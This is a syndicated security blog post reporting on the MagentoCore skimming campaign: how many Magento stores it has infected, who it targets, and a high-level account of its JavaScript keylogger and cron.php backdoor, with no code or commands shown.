MagentoCore: the Most Aggressive Skimmer Infects 60 Stores per Day

Security researcher Willem de Groot recently unearthed the most successful (so far) skimming campaign, at the center of which is the MagentoCore skimmer. The skimmer has already infected 7,339 Magento stores in the last 6 months, thus becoming the most aggressive campaign discovered by researchers.

The operators of MagentoCore managed to compromise thousands of e-commerce websites running on Magento, injecting the card scraper in their source code.

MagentoCore Skimmer: Who Is Targeted?

Apparently, victims of this skimming malware are some multi-million, publicly traded companies. This may suggest that the campaign is financially quite successful but in fact it is the customers of these companies that have their cards and identities stolen.

The average recovery time is a few weeks, but at least 1450 stores have hosted the parasite during the full past 6 months. The group hasn’t finished yet: new brands are hijacked at a pace of 50 to 60 stores per day over the last two weeks”, the researcher said.

MagentoCore Skimmer: How Does It Work?

First, the skimming malware is gaining access to the control panel of the targeted e-commerce website, in most cases via brute force attacks. Once the password is broken and the threat actor is in, an embedded piece of JavaScript is added to the HTML template.

The script (backup) is recording keystrokes from unsuspecting customers and is sending everything in real-time to the MagentoCore server, which is registered in Moscow, the researcher found out.

The MagentoCore skimmer also contains a recovery mechanism, and it is also designed to add a backdoor to cron.php. This is done so that the malware periodically downloads malicious code which is self-deleted after running, with no traces left.

More technical details:

– The file clean.json (backup) is in fact PHP code which is (Read more...)

*** This is a Security Bloggers Network syndicated blog from How to, Technology and PC Security Forum | authored by Milena Dimitrova. Read the original post at: